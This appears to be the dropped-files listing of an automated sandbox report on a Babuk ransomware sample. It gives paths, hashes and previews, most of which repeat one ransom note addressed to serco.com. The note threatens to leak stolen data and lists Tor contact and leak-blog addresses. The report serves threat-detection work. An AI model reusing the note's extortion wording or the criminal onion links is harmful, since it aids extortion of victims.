                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Indexed\Data\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Indexed\Data\nouser1\120712-0049\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Indexed\Data\nouser1\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Indexed\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DownloadHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Favorites\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\RACShare\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{0FB43FFB-4315-4B8D-896D-6369AF6B8B73}.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3752
                                                                            Entropy (8bit):7.948815967170085
                                                                            Encrypted:false
                                                                            SSDEEP:96:4aghJrcyIfi83684/F78ROxMSpiGrtjBlCcBovpiyEbhVs8cf:MJoyIp/4/F78wCJGrtD4v4ym8
                                                                            MD5:C03A0C0B8094DBCE51B990D867B90835
                                                                            SHA1:95AC5E38683A90344470C9F65709DD963C531D18
                                                                            SHA-256:B9B29CB3A79C74D0D4EC87CADACDB4C84874E65D83842BAF94F85830E30B419E
                                                                            SHA-512:F0D1AAF6587BDEF50BF3C94850010682A771A337E038F357AAF6963546A44F6132476DBF073844C8E61AA66C4B54A726A9546187C56E3CCED1B6BA014F6FA4B3
                                                                            Malicious:false
                                                                            Preview: ....XzN^yzx....A.;...S...C.o3"......#.......G.....X...6.L.5.c>Ry:..._.W.r..f../....r.Z.Q..9@.p....?,.l\6h.Z.:....:..#....Gt...<.\.Lp..Q.|...tf`.*...ng.z?.&....::?)...-.!....&q.! .,...X;...:.. H.`..i{..0....:.VYE..e...#.b..J.....o.$..$..hAk.1.U.....HS7.<.m.~D.o.6....>5.N-.....h.'..."q.v..1C.D......?7.q.s.zs...{.1..&.f...DO.1...SN...zS....z7YIc..=....1nE..?%...9.._Cj. IB.<..5'\.@r.y.j..C.....l.......|...v.....j....?It...t.r...........Ln...S....... l..hL.].e...9H.{4):d....)F;d...t...z.n1..<.>.rUo..+.h.h..[..d.=U...1.r\s./Xx..vh.B5.F..8V..Z[..u..1O.o.I]...x..i.r....vLy.".h......|......n...I.C>._x...E...e.^F...K...........=.............gf2..#.....mr..>3.G....+*.e.&=..kT/......B..ygF...j.......V.q.;8umF.....4(x.s.....q.'@..wv..k<...|o...U...'<.}....4.....l4pFjz...{.P..jw"OtRA.qvtAT.,1uMb.$....@..Y.J.m.<\.x.B~n.+....;7.U...NC..C.$.7G..8%U.|C..k..y`......tX...F._..8gL.c...H,....G-..M.5..C>$.-F.@._.b...:*].e^-v.O..u.....g...../T..!.......h..3J.].4..d
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
